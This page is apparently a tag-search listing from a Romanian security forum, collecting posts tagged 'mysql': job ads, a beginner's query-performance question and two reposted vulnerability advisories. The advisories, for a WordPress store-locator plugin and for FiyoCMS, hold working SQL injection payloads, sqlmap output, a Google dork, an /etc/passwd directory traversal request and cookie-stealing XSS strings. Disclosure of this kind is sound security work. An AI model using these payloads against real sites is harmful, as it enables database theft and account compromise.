Jump to content

Search the Community

Showing results for tags 'mysql'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. Din lipsa de timp, nu ma voi mai ocupa de aplicatiile desktop. Creez site-uri mici si mijlocii, scripturi, pagini, bug fixes, optimizari. Scriu cod curat si comentat. UPDATE: Dupa ce am vazut zeci de scripturi/pagini facute de unu si de altu', pot sa spun ca scriu caligrafic! Pentru site-uri complete ma pot ocupa si de gazduire si de configurarea serverului astfel incat site-ul sa fie predat "la cheie". Ofer si mentenanta unde este cazul. Backend: PHP + MySQL Frontend: HTML + CSS + jQuery / Bootstrap Metode de plata: Paypal sau Transfer bancar Plata: La finalizarea proiectului sau esalonat, de la caz la caz. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
  2. Salut. De doua zile ma confrunt cu o problema: load foarte mare din cauza mysql. uneori ajunge si la 17 VPS config: 8GB ECC RAM 40GB RAID10 SSD 4x Intel E5 v3 Cores, Debian 7, VestaCP Am gasit vinovaul, un script de "curatare a traficului". Scopul lui e ca fiecare site din db sa fie vizitat o singura data de pe un ip. Scriptul primeste in jur de 200000 - 250000 hituri pe zi. (M-am gandit sa fac treaba asta folosind cookies dar majoritatea folosesc private browsing si nu cred ca merge) Din ce am vazut cand am loadul mare asta ar fi vinovatul: SELECT * FROM sites WHERE status = '1' AND NOT EXISTS (SELECT idu FROM user_sites WHERE ip_address = '$ip' AND user_sites.siteid = sites.siteid) ORDER BY rand() LIMIT 1 Inainte sa radeti si cu fundul de mine vreau sa spun ca sunt incepator la asta, sunt foarte multe chestii pe care nu le stiu. Va rog sa ma ajutati cu niste sfaturi sau macar sa ma puneti pe directia cea buna Multumesc mult! <?php $ip = $_SERVER['REMOTE_ADDR']; $ref = $_SERVER['HTTP_REFERER']; $ua = $_SERVER['HTTP_USER_AGENT']; $proxy_headers = array( 'HTTP_VIA', 'HTTP_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_FORWARDED', 'HTTP_CLIENT_IP', 'HTTP_FORWARDED_FOR_IP', 'VIA', 'X_FORWARDED_FOR', 'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED', 'CLIENT_IP', 'FORWARDED_FOR_IP', 'HTTP_PROXY_CONNECTION' ); $con=mysqli_connect('localhost','#############','#############','############'); foreach($proxy_headers as $x){ if (isset($_SERVER[$x])) $useprxy = 1; } if ($useprxy != 1) { $sql = "SELECT * FROM sites WHERE status = '1' AND NOT EXISTS (SELECT idu FROM user_sites WHERE ip_address = '$ip' AND user_sites.siteid = sites.siteid) ORDER BY rand() LIMIT 1"; $result = mysqli_query($con, $sql); while ($row = $result->fetch_assoc()){ $url=$row['url']; $siteid=$row["siteid"]; $method=$row["method"]; $status=$row["status"]; $g=$row["g"]; $t=$row["t"];} if ( !empty($siteid)){ $sql = "INSERT INTO user_sites (ip_address, siteid) VALUES ('$ip', '$siteid')"; $insertip = mysqli_query($con, $sql); mysqli_close($con); $sql = "UPDATE sites SET visited_today = visited_today + 1, visited_total = visited_total + 1 WHERE siteid = $siteid"; $result = mysqli_query($con, $sql); mysqli_close($con); if ($method == "Google" || $method == "google") { header("refresh: 5; url=$g"); } elseif ($method == "Twitter" || $method == "twitter") { header("refresh: 5; url=$t"); } elseif ($method == "Blogger" || $method == "blogger") { header("refresh: 5; url=$burl"); } else { echo '<a href="'.$url.'" rel="noreferrer" id="autoclick"></a>'; echo "<script>setTimeout(document.getElementById'autoclick').click ),5000);</script>"; } } else { $sql = "UPDATE duplicate SET duplicate = duplicate + 1"; $result = mysqli_query($con, $sql); $sql1 = "SELECT * FROM duplicate WHERE id = 1"; $select1 = mysqli_query($con, $sql1); while ($row = $select1->fetch_assoc()){ $durl=$row['url'];} echo '<a href="'.$durl.'" rel="noreferrer" id="autoclick"></a>'; echo "<script>setTimeout(document.getElementById('autoclick').click(),5000);</script>";} mysqli_close($con); } } else { $sql = "INSERT INTO proxy (proxy) VALUES ('$ip')"; $insertip = mysqli_query($con, $sql); mysqli_close($con); header("refresh: 5; url='https://google.com'"); } ?> Structura DB: Sites 1 siteid int(11) No None AUTO_INCREMENT 2 site_name text latin1_swedish_ci No None 3 url text latin1_swedish_ci No None 4 method text latin1_swedish_ci No None 5 status text latin1_swedish_ci No None 6 g text latin1_swedish_ci No None 7 t text latin1_swedish_ci No None 8 visited_today int(11) No None 9 visited_total int(11) No None user_sites 1 idu int(11) No None AUTO_INCREMENT 2 ip_address text latin1_swedish_ci No None 3 siteid int(11) No None 4 expires datetime No None Setari mysql din etc/mysql/my.cnf skip-external-locking key_buffer_size = 256M max_allowed_packet = 32M table_open_cache = 256 sort_buffer_size = 1M read_buffer_size = 1M read_rnd_buffer_size = 4M myisam_sort_buffer_size = 64M thread_cache_size = 8 query_cache_size= 16M thread_concurrency = 8 #innodb_use_native_aio = 0 innodb_file_per_table max_connections=200 max_user_connections=50 wait_timeout=10 interactive_timeout=50 long_query_time=5
  3. Salut! Sunt interesata de programatori back-end . Este vorba despre o colaborare pe termen lung, pentru o aplicatie web. Detalii : // Trimiteti PM pentru mail
  4. Job Bucuresti! Lucian & Parters SRL-D (site in constructie) este un start-up cu o echipa tanara, ambitii mari si proiecte in asteptare gata sa fie dezvoltate. Prin urmare cautam developeri incepatori sau experimentati care au finalizat cel putin un proiect in Laravel. Orice alte cunostinte de programare pentru web sunt binevenite. Principala activitate reprezinta dezvoltarea de aplicatii web in PHP/MySQL, CSS/HTML folosind in principal framework-ul Laravel 5 conform cerintelor clientului de la sediul firmei situat in zona Piata Romana. Salariul va fi unul de maximum 3000 RON pentru inceput in functie de cunostinte, experienta etc. cu posiblitatea de marire pe parcurs ce start-up-ul va creste. Cei interesati va rog sa-mi trimite-ti un pm cu cv-ul si proiectele voastre. EXTRA: cautam un profesionist Laravel 5 "gen freelancer" dar sa poata lucra de la sediul firmei impreuna cu clientul pentru un proiect important timp de o luna. Rog numai cei seriosi.
  5. DrWire

    Hello

    Hello, I'am DrWire and i registered here for some stuff and tutorials. I work as system administrator, my skills is: php,python,perl,html,css,some mysql,c++ and some information about networking. -Sorry for bad english, I'am from Germany.
  6. Ca sa ai un graph asa cum se presupune ca e la facebook, cu date, cu tot, datele sunt stocate intr-o baza de date MySql si accesate la nevoie de graph sau se afla in graph "on the fly" fara a fi stocate intr-o baza de date ? In cazul in care graphul acceseaza datele dintr-o baza de date, nu se pierde mai mult timp decat daca ar fi luate pur si simplu din baza de date cu MySQL syntax ? Nu se poate construi o baza de date MySql care sa simuleze practic ceea ce face si graphul ? Si daca se poate, de ce nu se face asa si se prefera "graph algorithm" in locul unei baze de date obisnuite ? Va rog sa ma lamuriti si pe mine cu aceste probleme fiindca nu prea am inteles cum sta treaba. Multumesc anticipat !
  7. ###################### # Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress - Ajax Store Locator - Wordpress | CodeCanyon # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2015-03-29 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # Info: The "sl_dal_searchlocation_cbf" ajax function is affected from SQL Injection vulnerability "StoreLocation" var is not sanitized # PoC Exploit: http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ) StoreLocation's value must contain "~" delimiter $storeLoc = $_REQUEST["StoreLocation"]; ... ... $qryVal = explode("~", $storeLoc); $sql_query = "SELECT a.*,b.*, 0 as ......... LEFT JOIN `$sl_tb_pluginset` as b ON (1=1) WHERE a.id=$qryVal[1]" # PoC sqlmap: sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1" -p StoreLocation --dbms mysql [18:24:11] [iNFO] GET parameter 'StoreLocation' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [18:24:18] [iNFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [18:24:18] [iNFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [18:24:24] [iNFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [18:24:29] [iNFO] checking if the injection point on GET parameter 'StoreLocation' is a false positive GET parameter 'StoreLocation' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 89 HTTP(s) requests: --- Parameter: StoreLocation (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCKZ) --- [18:29:48] [iNFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5.10 web application technology: PHP 5.3.3, Apache 2.2.3 back-end DBMS: MySQL 5.0.12 ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog archive_exploit Archives - HomeLab IT - Virtualization, Security, Linux Blog (Full HomelabIT Archive Exploit) F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpajaxstorelocator-sql.txt
  8. Sunt curios ce fel de damage se poate face daca cunosti urmatoarele date de la un mysql la un site de wordpress?. Spre exemplu: /** The name of the database for WordPress */ define('DB_NAME', 'xxxx'); /** MySQL database username */ define('DB_USER', 'xxxx'); /** MySQL database password */ define('DB_PASSWORD', 'xxxxxx'); /** MySQL hostname */ define('DB_HOST', 'xxxxx'); define('AUTH_KEY', define('SECURE_AUTH_KEY', define('LOGGED_IN_KEY', define('NONCE_KEY', define('AUTH_SALT', define('SECURE_AUTH_SALT', define('LOGGED_IN_SALT', define('NONCE_SALT',
  9. Link: Free PHP Web Hosting. No Forced Ads. Unlimited Resources. #1 in USA, UK & Canada -> F?r? reclame... -> Full Wordpress , PHP & MySql Support.
  10. # Exploit Title: FiyoCMS Multiple Vulnerabilities # Date: 29 March 2015 # Exploit Author: Mahendra # Vendor Homepage: Open Source CMS, CMS Indonesia - Fiyo CMS # Software Link: Fiyo CMS | SourceForge.net # Version: 2.0.1.8, other version might be vulnerable. # Tested : Kali Linux 1.0.9a-amd64 # CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148 *Advisory Timeline* 30-11-2014: Vendor notified and responded back 01-12-2014: Vulnerabilities provided to vendor 03-14-2015: Vendor released newer version claimed to fix the vulnerabilities 29-03-2015: Advisory released ---------------------------------------------------- FiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass ---------------------------------------------------- *Advisory details* Several security issues have been identified on the latest FiyoCMS platform. *Proof of Concept (PoC)* ---------------------------------------------------- Multiple SQL Injection - CVE-2014-9145 ---------------------------------------------------- * PoC: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=edit&id=1[sqli] * Sqlmap: Parameter: id Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: app=user&act=edit&id=-7672 UNION ALL SELECT NULL,NULL,CONCAT(0x7171676471,0x66457070464452786c58,0x716a767471),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: app=user&act=edit&id=1 AND SLEEP(5) * PoC: http://192.168.248.132/fiyo/dapur/apps/app_article/controller/article_list.php?cat=[sqli]&user=[sqli]&level=[sqli]&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 * Sqlmap: Parameter: cat Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=' AND (SELECT 4352 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (4352=4352) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yeEe'='yeEe&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4f654364434f746c7477,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat=' AND 2332=BENCHMARK(5000000,MD5(0x4a495770)) AND 'RlLS'='RlLS&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Parameter: level Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=&user=&level=' AND (SELECT 6522 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (6522=6522) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pqqp'='Pqqp&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat=&user=&level=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71666f7671,0x6163446a67456e557a48,0x7164687671),NULL,NULL,NULL#&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat=&user=&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Parameter: user Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=&user=' AND (SELECT 8990 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (8990=8990) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VhKM'='VhKM&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat=&user=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4652577247546e6b5241,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat=&user=' AND 1262=BENCHMARK(5000000,MD5(0x72797451)) AND 'egJe'='egJe&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 * PoC: POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 Host: 192.168.248.132 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add Content-Length: 42 Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off Connection: keep-alive Pragma: no-cache Cache-Control: no-cache act=email&email=test@asdas.com[sqli] * Sqlmap: Parameter: email Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=email&email=test@asdas.com' AND 5514=5514 AND 'KTqH'='KTqH Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT * PoC: POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 Host: 192.168.248.132 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add Content-Length: 34 Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off Connection: keep-alive Pragma: no-cache Cache-Control: no-cache act=user&username=test[sqli] * Sqlmap: Parameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT -------------------------------------------------------------------- Directory Traversal - kcfinder plugins - CVE-2014-1222 -------------------------------------------------------------------- FiyoCMS was identified to be using an outdated KCFinder plugin which vulnerable to directory traversal attack. POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1 Host: 192.168.248.132 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.248.132/fiyo//plugins/plg_kcfinder/browse.php?type=files Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 34 dir=files&file=../../../../../../../etc/passwd ---------------------------------------------------- Reflected XSS - CVE-2014-9146 ---------------------------------------------------- http://192.168.248.132/fiyo/?app=article&view=item31ab2"><script>alert(1)</script>0ccba&id=186 http://192.168.248.132/fiyo/?app=article&view=item&id=18690fdb"><script>alert(1)</script>d99c9 http://192.168.248.132/fiyo/?page=5eac15eac1"><script>alert(1)</script>774f2 http://192.168.248.132/fiyo/?app=article95ce1"><script>alert(1)</script>298ab&view=item&id=186 http://192.168.248.132/fiyo/dapur/index.php?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5 ---------------------------------------------------- Direct URL Access - CVE-2014-9147 ---------------------------------------------------- To download database backup without any authentications required. http://192.168.248.132/fiyo/.backup/[db_backup.sql filename] ---------------------------------------------------- Access Control Bypass - CVE-2014-9148 ---------------------------------------------------- To access super administrator functions "Install & Update" and "Backup" by administrator user, just go directly to the URL below: 1. http://192.168.248.132/fiyo/dapur/?app=config&view=backup 2. http://192.168.248.132/fiyo/dapur/?app=config&view=install Source: http://dl.packetstormsecurity.net/1503-exploits/fiyocms-sqlxssbypass.txt
  11. Sunt multi care nu stiu ce este, dar la l-au vazut in aplicare in diferite tutoriale de mysql injection. De aici il puteti descarca https://addons.mozilla.org/ro/firefox/addon/hackbar/ . Si un mic tutorial de folosire :
  12. Step # 1 : Stop MySQL service # /etc/init.d/mysql stop Output: Stopping MySQL database server: mysqld. Step # 2: Start to MySQL server w/o password: # mysqld_safe --skip-grant-tables & Output: [1] 5988 Starting mysqld daemon with databases from /var/lib/mysql mysqld_safe[6025]: started Step # 3: Connect to MySQL server using mysql client: # mysql -u root Output: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1 to server version:4.1.15-Debian_1-log Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> Step # 4: Setup new MySQL root user password mysql> use mysql; mysql> update user set password=PASSWORD("new_passwd") where User='root'; mysql> flush privileges; mysql> quit Step # 5: Stop MySQL Server: # /etc/init.d/mysql stop Output: Stopping MySQL database server: mysqld STOPPING server from pid file /var/run/mysqld/mysqld.pid mysqld_safe[6186]: ended [1]+ Done mysqld_safe--skip-grant-tables Step # 6: Start MySQL server and test it /etc/init.d/mysql start mysql -u root -p Credit's to: razvan1@hy
